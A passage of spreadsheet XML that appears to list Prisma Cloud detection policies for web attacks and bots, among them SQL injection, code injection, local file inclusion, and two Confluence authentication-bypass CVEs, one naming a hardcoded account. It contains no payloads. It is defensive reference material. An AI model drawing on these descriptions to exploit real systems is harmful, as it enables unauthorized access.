      </c>
      <c r="X341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4" t="inlineStr"/>
      <c r="Z3414" t="inlineStr"/>
      <c r="AA3414" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3414" t="inlineStr">
        <is>
          <t>2023-08-21 05:27:15</t>
        </is>
      </c>
      <c r="AC3414" t="inlineStr"/>
      <c r="AD3414" t="b">
        <v>1</v>
      </c>
      <c r="AE3414" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3414" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG341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4" t="inlineStr">
        <is>
          <t>416deef9-e913-437b-9f96-061021ef8e11</t>
        </is>
      </c>
      <c r="AI3414" t="inlineStr"/>
      <c r="AJ3414" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3414" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3415">
      <c r="A3415" t="inlineStr"/>
      <c r="B3415" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3415" s="2" t="inlineStr"/>
      <c r="D3415" t="inlineStr"/>
      <c r="E3415" t="inlineStr"/>
      <c r="F3415" t="inlineStr"/>
      <c r="G3415" t="b">
        <v>1</v>
      </c>
      <c r="H341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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3415" t="inlineStr">
        <is>
          <t>unknown_bots_api</t>
        </is>
      </c>
      <c r="K3415" t="inlineStr">
        <is>
          <t>Web Scraper activity</t>
        </is>
      </c>
      <c r="L3415" t="inlineStr">
        <is>
          <t>WEB_SCRAPING</t>
        </is>
      </c>
      <c r="M3415" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3415" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3415" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3415" t="inlineStr">
        <is>
          <t>unknown_bots</t>
        </is>
      </c>
      <c r="Q3415" t="inlineStr"/>
      <c r="R3415" t="inlineStr"/>
      <c r="S3415" t="inlineStr"/>
      <c r="T3415" t="b">
        <v>0</v>
      </c>
      <c r="U3415" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3415" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3415" t="inlineStr">
        <is>
          <t>This policy detects Web Scrapers. Web Scrapers are automated tools or services designed to systematically access, enumerate and scrape website content.</t>
        </is>
      </c>
      <c r="X341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5" t="inlineStr"/>
      <c r="Z3415" t="inlineStr"/>
      <c r="AA3415" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3415" t="inlineStr">
        <is>
          <t>2024-02-21 07:55:14</t>
        </is>
      </c>
      <c r="AC3415" t="inlineStr"/>
      <c r="AD3415" t="b">
        <v>1</v>
      </c>
      <c r="AE3415" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3415" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG341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5" t="inlineStr">
        <is>
          <t>6b182841-6094-4cd6-a273-9ae2a5c4fd60</t>
        </is>
      </c>
      <c r="AI3415" t="inlineStr"/>
      <c r="AJ3415" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3415" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3416">
      <c r="A3416" t="inlineStr"/>
      <c r="B3416" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3416" s="2" t="inlineStr"/>
      <c r="D3416" t="inlineStr"/>
      <c r="E3416" t="inlineStr"/>
      <c r="F3416" t="inlineStr"/>
      <c r="G3416" t="b">
        <v>1</v>
      </c>
      <c r="H341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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3416" t="inlineStr">
        <is>
          <t>injections_api</t>
        </is>
      </c>
      <c r="K3416" t="inlineStr">
        <is>
          <t>Code Injection payload detected in HTTP traffic</t>
        </is>
      </c>
      <c r="L3416" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3416" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3416" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3416" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3416" t="inlineStr">
        <is>
          <t>injections</t>
        </is>
      </c>
      <c r="Q3416" t="inlineStr"/>
      <c r="R3416" t="inlineStr"/>
      <c r="S3416" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3416" t="b">
        <v>0</v>
      </c>
      <c r="U3416" t="inlineStr">
        <is>
          <t>web_attacks</t>
        </is>
      </c>
      <c r="V3416" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3416" t="inlineStr">
        <is>
          <t>This policy detects Code injection attacks. Code injection is a form of attack in which code is injected and interpreted by the application or other runtimes.
Code payloads are either injected as part of HTTP requests or included from local or remote files (also known as File Inclusion).</t>
        </is>
      </c>
      <c r="X341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6" t="inlineStr"/>
      <c r="Z3416" t="inlineStr"/>
      <c r="AA3416" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3416" t="inlineStr">
        <is>
          <t>2024-10-14 06:35:59</t>
        </is>
      </c>
      <c r="AC3416" t="inlineStr"/>
      <c r="AD3416" t="b">
        <v>1</v>
      </c>
      <c r="AE3416" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3416" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG341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6" t="inlineStr">
        <is>
          <t>05467c80-8cda-4c60-b0af-d91e2695fb95</t>
        </is>
      </c>
      <c r="AI3416" t="inlineStr"/>
      <c r="AJ3416" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3416" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3417">
      <c r="A3417" t="inlineStr"/>
      <c r="B3417" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3417" s="2" t="inlineStr"/>
      <c r="D3417" t="inlineStr"/>
      <c r="E3417" t="inlineStr"/>
      <c r="F3417" t="inlineStr"/>
      <c r="G3417" t="b">
        <v>1</v>
      </c>
      <c r="H341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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3417" t="inlineStr">
        <is>
          <t>injections_api</t>
        </is>
      </c>
      <c r="K3417" t="inlineStr">
        <is>
          <t>SQL injection payload detected in HTTP traffic</t>
        </is>
      </c>
      <c r="L3417" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3417" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3417" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3417" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3417" t="inlineStr">
        <is>
          <t>injections</t>
        </is>
      </c>
      <c r="Q3417" t="inlineStr"/>
      <c r="R3417" t="inlineStr"/>
      <c r="S3417" t="inlineStr"/>
      <c r="T3417" t="b">
        <v>0</v>
      </c>
      <c r="U3417" t="inlineStr">
        <is>
          <t>web_attacks</t>
        </is>
      </c>
      <c r="V3417" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3417" t="inlineStr">
        <is>
          <t>This policy detects SQL Injection attacks. An SQL injection (SQLi) attack occurs when an attacker inserts an SQL query into the input fields of a web application. A successful attack can read sensitive data from the database, modify data in the database, or run arbitrary commands.
WAAS parses and tokenizes input streams (request data) and then detects malicious attempts to inject unauthorized SQL queries.</t>
        </is>
      </c>
      <c r="X341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7" t="inlineStr"/>
      <c r="Z3417" t="inlineStr"/>
      <c r="AA3417" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3417" t="inlineStr">
        <is>
          <t>2023-08-21 05:27:15</t>
        </is>
      </c>
      <c r="AC3417" t="inlineStr"/>
      <c r="AD3417" t="b">
        <v>1</v>
      </c>
      <c r="AE3417" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3417" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG341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7" t="inlineStr">
        <is>
          <t>a3e4daf4-de1d-4ac8-84e5-9eda7d02378c</t>
        </is>
      </c>
      <c r="AI3417" t="inlineStr"/>
      <c r="AJ3417" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3417" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3418">
      <c r="A3418" t="inlineStr"/>
      <c r="B3418" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3418" s="2" t="inlineStr"/>
      <c r="D3418" t="inlineStr"/>
      <c r="E3418" t="inlineStr"/>
      <c r="F3418" t="inlineStr"/>
      <c r="G3418" t="b">
        <v>1</v>
      </c>
      <c r="H341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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3418" t="inlineStr">
        <is>
          <t>unknown_bots_api</t>
        </is>
      </c>
      <c r="K3418" t="inlineStr">
        <is>
          <t>Browser impersonation detected in HTTP traffic</t>
        </is>
      </c>
      <c r="L3418" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3418" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3418" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3418" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3418" t="inlineStr">
        <is>
          <t>unknown_bots</t>
        </is>
      </c>
      <c r="Q3418" t="inlineStr"/>
      <c r="R3418" t="inlineStr"/>
      <c r="S3418" t="inlineStr"/>
      <c r="T3418" t="b">
        <v>0</v>
      </c>
      <c r="U3418" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3418" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3418" t="inlineStr">
        <is>
          <t>This policy detects Browser Impersonators. Browser impersonators are software programs or tools that mimic the behavior of a web browser to automate tasks such as web scraping or testing. These tools typically provide developers with APIs to programmatically interact with websites in a way that simulates human browsing behavior.</t>
        </is>
      </c>
      <c r="X341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8" t="inlineStr"/>
      <c r="Z3418" t="inlineStr"/>
      <c r="AA3418" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3418" t="inlineStr">
        <is>
          <t>2023-08-21 05:27:15</t>
        </is>
      </c>
      <c r="AC3418" t="inlineStr"/>
      <c r="AD3418" t="b">
        <v>1</v>
      </c>
      <c r="AE3418" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3418" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG341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8" t="inlineStr">
        <is>
          <t>83fc53a0-e0b1-4120-9a7c-6ac0da4647a4</t>
        </is>
      </c>
      <c r="AI3418" t="inlineStr"/>
      <c r="AJ3418" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3418" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3419">
      <c r="A3419" t="inlineStr"/>
      <c r="B3419" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3419" s="2" t="inlineStr"/>
      <c r="D3419" t="inlineStr"/>
      <c r="E3419" t="inlineStr"/>
      <c r="F3419" t="inlineStr"/>
      <c r="G3419" t="b">
        <v>1</v>
      </c>
      <c r="H341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19" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3419" t="inlineStr">
        <is>
          <t>injections_api</t>
        </is>
      </c>
      <c r="K3419" t="inlineStr">
        <is>
          <t>Local File Inclusion payload detected in HTTP traffic</t>
        </is>
      </c>
      <c r="L3419" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3419" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3419" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3419" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3419" t="inlineStr">
        <is>
          <t>injections</t>
        </is>
      </c>
      <c r="Q3419" t="inlineStr"/>
      <c r="R3419" t="inlineStr"/>
      <c r="S3419" t="inlineStr"/>
      <c r="T3419" t="b">
        <v>0</v>
      </c>
      <c r="U3419" t="inlineStr">
        <is>
          <t>web_attacks</t>
        </is>
      </c>
      <c r="V3419" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3419" t="inlineStr">
        <is>
          <t>This policy detects Local File Inclusion attacks. Local File Inclusion is a form of attack in which attackers attempt to gain unauthorized access to locally stored sensitive files on the web application host.
Such access attempts are often made using directory traversal attacks or exploiting file inclusion vulnerabilities in the application.</t>
        </is>
      </c>
      <c r="X341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19" t="inlineStr"/>
      <c r="Z3419" t="inlineStr"/>
      <c r="AA3419" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3419" t="inlineStr">
        <is>
          <t>2023-08-21 05:27:15</t>
        </is>
      </c>
      <c r="AC3419" t="inlineStr"/>
      <c r="AD3419" t="b">
        <v>1</v>
      </c>
      <c r="AE3419" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3419" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG341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19" t="inlineStr">
        <is>
          <t>f199992c-5910-49ca-9d96-113abedc58b7</t>
        </is>
      </c>
      <c r="AI3419" t="inlineStr"/>
      <c r="AJ3419" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3419" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3420">
      <c r="A3420" t="inlineStr"/>
      <c r="B3420" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3420" s="2" t="inlineStr"/>
      <c r="D3420" t="inlineStr"/>
      <c r="E3420" t="inlineStr"/>
      <c r="F3420" t="inlineStr"/>
      <c r="G3420" t="b">
        <v>0</v>
      </c>
      <c r="H342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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3420" t="inlineStr">
        <is>
          <t>known_bots_api</t>
        </is>
      </c>
      <c r="K3420" t="inlineStr">
        <is>
          <t>News bot activity</t>
        </is>
      </c>
      <c r="L3420" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3420" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3420" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3420" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3420" t="inlineStr">
        <is>
          <t>known_bots</t>
        </is>
      </c>
      <c r="Q3420" t="inlineStr"/>
      <c r="R3420" t="inlineStr"/>
      <c r="S3420" t="inlineStr"/>
      <c r="T3420" t="b">
        <v>0</v>
      </c>
      <c r="U3420" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3420" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3420" t="inlineStr">
        <is>
          <t>This policy detects bots that crawl, extract and index the latest news articles, usually for news aggregation services.</t>
        </is>
      </c>
      <c r="X342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0" t="inlineStr"/>
      <c r="Z3420" t="inlineStr"/>
      <c r="AA3420" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3420" t="inlineStr">
        <is>
          <t>2023-06-15 01:00:00</t>
        </is>
      </c>
      <c r="AC3420" t="inlineStr"/>
      <c r="AD3420" t="b">
        <v>1</v>
      </c>
      <c r="AE3420" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3420" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG342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0" t="inlineStr">
        <is>
          <t>8c7a03ca-91b6-443e-b9c4-f809465848d5</t>
        </is>
      </c>
      <c r="AI3420" t="inlineStr"/>
      <c r="AJ3420" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3420" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3421">
      <c r="A3421" t="inlineStr"/>
      <c r="B3421" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3421" s="2" t="inlineStr"/>
      <c r="D3421" t="inlineStr"/>
      <c r="E3421" t="inlineStr"/>
      <c r="F3421" t="inlineStr"/>
      <c r="G3421" t="b">
        <v>1</v>
      </c>
      <c r="H342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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3421" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3421" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2023-22515 - Confluence authentication bypass ) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3421" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3421" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3421" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3421" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3421" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3421" t="inlineStr"/>
      <c r="R3421" t="inlineStr"/>
      <c r="S3421" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3421" t="b">
        <v>0</v>
      </c>
      <c r="U3421" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3421" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3421" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
CVE-2023-22515 is a critical Broken Access Control vulnerability affecting Atlassian Confluence Data Center and Server. It allows unauthenticated remote attackers to create unauthorized Confluence administrator accounts and access Confluence instances.</t>
        </is>
      </c>
      <c r="X342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1" t="inlineStr"/>
      <c r="Z3421" t="inlineStr"/>
      <c r="AA3421" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3421" t="inlineStr">
        <is>
          <t>2024-06-21 07:13:08</t>
        </is>
      </c>
      <c r="AC3421" t="inlineStr"/>
      <c r="AD3421" t="b">
        <v>1</v>
      </c>
      <c r="AE3421" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3421" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG342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1" t="inlineStr">
        <is>
          <t>94bc59e6-25c5-46f3-8480-709e1e2b6cef</t>
        </is>
      </c>
      <c r="AI3421" t="inlineStr"/>
      <c r="AJ3421" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3421" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3422">
      <c r="A3422" t="inlineStr"/>
      <c r="B3422" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3422" s="2" t="inlineStr"/>
      <c r="D3422" t="inlineStr"/>
      <c r="E3422" t="inlineStr"/>
      <c r="F3422" t="inlineStr"/>
      <c r="G3422" t="b">
        <v>1</v>
      </c>
      <c r="H342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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3422" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3422" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2022-26138 - Confluence authentication bypass) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3422" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3422" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3422" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3422" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3422" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3422" t="inlineStr"/>
      <c r="R3422" t="inlineStr"/>
      <c r="S3422" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3422" t="b">
        <v>0</v>
      </c>
      <c r="U3422" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3422" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3422" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
The Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.</t>
        </is>
      </c>
      <c r="X342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2" t="inlineStr"/>
      <c r="Z3422" t="inlineStr"/>
      <c r="AA3422" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3422" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3422" t="inlineStr"/>
      <c r="AD3422" t="b">
        <v>1</v>
      </c>
      <c r="AE3422" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3422" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG342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2" t="inlineStr">
        <is>
          <t>7540a1f5-a062-4566-82c6-044f81ea55ad</t>
        </is>
      </c>
      <c r="AI3422" t="inlineStr"/>
      <c r="AJ3422" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3422" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3423">
      <c r="A3423" t="inlineStr"/>
      <c r="B3423" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3423" s="2" t="inlineStr"/>
      <c r="D3423" t="inlineStr"/>
      <c r="E3423" t="inlineStr"/>
      <c r="F3423" t="inlineStr"/>
      <c r="G3423" t="b">
        <v>1</v>
      </c>
      <c r="H342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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3423" t="inlineStr">
        <is>
          <t>unknown_bots_api</t>
        </is>
      </c>
      <c r="K3423" t="inlineStr">
        <is>
          <t>HTTP requests that exhibit unusual characteristics</t>
        </is>
      </c>
      <c r="L3423" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3423" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3423" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3423" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3423" t="inlineStr">
        <is>
          <t>unknown_bots</t>
        </is>
      </c>
      <c r="Q3423" t="inlineStr"/>
      <c r="R3423" t="inlineStr"/>
      <c r="S3423" t="inlineStr"/>
      <c r="T3423" t="b">
        <v>0</v>
      </c>
      <c r="U3423" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3423" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3423" t="inlineStr">
        <is>
          <t>The policy detects automated traffic by detecting HTTP requests that exhibit unusual characteristics not typically associated with common web browsers, such as typos or outdated browser versions.</t>
        </is>
      </c>
      <c r="X342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3" t="inlineStr"/>
      <c r="Z3423" t="inlineStr"/>
      <c r="AA3423" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3423" t="inlineStr">
        <is>
          <t>2023-08-21 05:27:15</t>
        </is>
      </c>
      <c r="AC3423" t="inlineStr"/>
      <c r="AD3423" t="b">
        <v>1</v>
      </c>
      <c r="AE3423" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3423" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG342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3" t="inlineStr">
        <is>
          <t>c8ea75f5-0d07-4a65-8d2e-ee795e3030e2</t>
        </is>
      </c>
      <c r="AI3423" t="inlineStr"/>
      <c r="AJ3423" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3423" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3424">
      <c r="A3424" t="inlineStr"/>
      <c r="B3424" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3424" s="2" t="inlineStr"/>
      <c r="D3424" t="inlineStr"/>
      <c r="E3424" t="inlineStr"/>
      <c r="F3424" t="inlineStr"/>
      <c r="G3424" t="b">
        <v>1</v>
      </c>
      <c r="H342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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3424" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="K3424" t="inlineStr">
        <is>
          <t>API request does not conform to the API specification.</t>
        </is>
      </c>
      <c r="L3424" t="inlineStr">
        <is>
          <t>NETWORK_ANOMALY</t>
        </is>
      </c>
      <c r="M3424" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3424" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3424" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3424" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3424" t="inlineStr"/>
      <c r="R3424" t="inlineStr"/>
      <c r="S3424" t="inlineStr"/>
      <c r="T3424" t="b">
        <v>0</v>
      </c>
      <c r="U3424" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3424" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3424" t="inlineStr">
        <is>
          <t>The API Compliance Policy is designed to guarantee that all API requests align with the predefined API specifications. By enforcing strict adherence to these specifications, this policy ensures consistency, reliability, and interoperability in API usage.</t>
        </is>
      </c>
      <c r="X342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4" t="inlineStr"/>
      <c r="Z3424" t="inlineStr"/>
      <c r="AA3424" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3424" t="inlineStr">
        <is>
          <t>2024-05-10 07:06:32</t>
        </is>
      </c>
      <c r="AC3424" t="inlineStr"/>
      <c r="AD3424" t="b">
        <v>1</v>
      </c>
      <c r="AE3424" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3424" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG342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4" t="inlineStr">
        <is>
          <t>5bc097f2-f40c-4a20-be95-2d54706ca617</t>
        </is>
      </c>
      <c r="AI3424" t="inlineStr"/>
      <c r="AJ3424" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3424" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3425">
      <c r="A3425" t="inlineStr"/>
      <c r="B3425" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3425" s="2" t="inlineStr"/>
      <c r="D3425" t="inlineStr"/>
      <c r="E3425" t="inlineStr"/>
      <c r="F3425" t="inlineStr"/>
      <c r="G3425" t="b">
        <v>0</v>
      </c>
      <c r="H342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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3425" t="inlineStr">
        <is>
          <t>known_bots_api</t>
        </is>
      </c>
      <c r="K3425" t="inlineStr">
        <is>
          <t>Financial bot activity</t>
        </is>
      </c>
      <c r="L3425" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3425" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3425" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3425" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3425" t="inlineStr">
        <is>
          <t>known_bots</t>
        </is>
      </c>
      <c r="Q3425" t="inlineStr"/>
      <c r="R3425" t="inlineStr"/>
      <c r="S3425" t="inlineStr"/>
